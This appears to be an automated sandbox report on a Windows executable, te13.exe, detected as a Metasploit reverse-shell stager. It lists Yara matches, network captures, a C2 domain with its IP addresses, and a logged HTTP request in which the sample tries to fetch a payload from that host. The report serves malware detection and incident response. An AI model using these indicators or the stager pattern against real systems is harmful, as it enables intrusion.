.agvr	0x4000	0x360	0x400	80b1491ff605dfbc471b877855a2859f	False	0.7216796875	data	5.615151822241745	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.dll	VirtualAlloc, ExitProcess

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T14:12:56.853961+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	104.21.16.1	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:12:56.290431976 CET	49730	8080	192.168.2.4	104.21.16.1
Jan 7, 2025 14:12:56.295248032 CET	8080	49730	104.21.16.1	192.168.2.4
Jan 7, 2025 14:12:56.295326948 CET	49730	8080	192.168.2.4	104.21.16.1
Jan 7, 2025 14:12:56.295483112 CET	49730	8080	192.168.2.4	104.21.16.1
Jan 7, 2025 14:12:56.300209999 CET	8080	49730	104.21.16.1	192.168.2.4
Jan 7, 2025 14:12:56.853904009 CET	8080	49730	104.21.16.1	192.168.2.4
Jan 7, 2025 14:12:56.853960991 CET	49730	8080	192.168.2.4	104.21.16.1
Jan 7, 2025 14:13:11.941540003 CET	49730	8080	192.168.2.4	104.21.16.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:12:56.242747068 CET	63496	53	192.168.2.4	1.1.1.1
Jan 7, 2025 14:12:56.254098892 CET	53	63496	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 14:12:56.242747068 CET	192.168.2.4	1.1.1.1	0x67ff	Standard query (0)	softwareshop.win	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 14:12:56.254098892 CET	1.1.1.1	192.168.2.4	0x67ff	No error (0)	softwareshop.win	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

softwareshop.win:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.16.1	8080	5448	C:\Users\user\Desktop\te13.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:12:56.295483112 CET	285	OUT	GET /softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid HTTP/1.1 Host: softwareshop.win:8080 Cache-Control: no-cache
Jan 7, 2025 14:12:56.853904009 CET	971	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 13:12:56 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMEdyYyGMsROjAoeHWTic7crMyiSRWLpFyvqt5%2FaMxI8BioT2UA3j5Ph%2FCIn6ylRpvdcdMxWgxBcMHzj5kFk13Z8qaOvpUhAoEwMEDf%2F1gVvfzGPmKVMxu9PDUuAv7Sb8Zc3st%2B%2BxEo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe433ca5ce41899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=285&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Target ID:	0
Start time:	08:12:55
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\te13.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\te13.exe"
Imagebase:	0x140000000
File size:	7'168 bytes
MD5 hash:	7A2C49CBEC37B52A946C0131FE4CD308
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:12:56
Start date:	07/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5448 -s 1132
Imagebase:	0x7ff6999d0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	54.5%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000000014000416A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84280200,00000000,?,00000000), ref: 000000014000423E

Strings

U.;, xrefs: 0000000140004237

Memory Dump Source

Source File: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1818095137.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_te13.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: U.;
API String ID: 1984915467-4213443877
Opcode ID: 63530b45eaac054f3ae90e55ef99b68215c6987cd672bcb065aeec569be4bcfe
Instruction ID: 4bfee329538aff243464cd7a59acbfdf8bdcbb2fd75501d2334cdd204a1a7867
Opcode Fuzzy Hash: 63530b45eaac054f3ae90e55ef99b68215c6987cd672bcb065aeec569be4bcfe
Instruction Fuzzy Hash: F121A0F360A18069F763D9A7BE10FAD6B64E398BD5F8D5020BF01131B2E6349955860C

Function 000000014000421F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84280200,00000000,?,00000000), ref: 000000014000423E
VirtualAlloc.KERNELBASE ref: 000000014000429B

Strings

U.;, xrefs: 0000000140004237

Memory Dump Source

Source File: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1818095137.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_te13.jbxd

Yara matches

Similarity

API ID: AllocHttpOpenRequestVirtual
String ID: U.;
API String ID: 1375534387-4213443877
Opcode ID: 077b514da7c3aff8053043f808370ff9211202d819f687590ec8e0c1af48250c
Instruction ID: 8a241cdc7c2eb93f1ef76595eb7b55abde1d725fd3c6d3168c605e612dea8ab9
Opcode Fuzzy Hash: 077b514da7c3aff8053043f808370ff9211202d819f687590ec8e0c1af48250c
Instruction Fuzzy Hash: 92014BE271524958FB1292A7BD25FB902496B9CFE8F8D40207E08AB3D6F96889858119

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report te13.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_te13.exe_c48cbeabb6838b73a54ab796986b6ff6afe20c0_dd8ad63c_d90a66ee-d5b7-4325-aeea-4bf0f6e673c4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF4E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB00A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB03A.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
te13.exe

Function 000000014000416A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
networkCOMMON

Function 000000014000421F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
memorynetworkCOMMON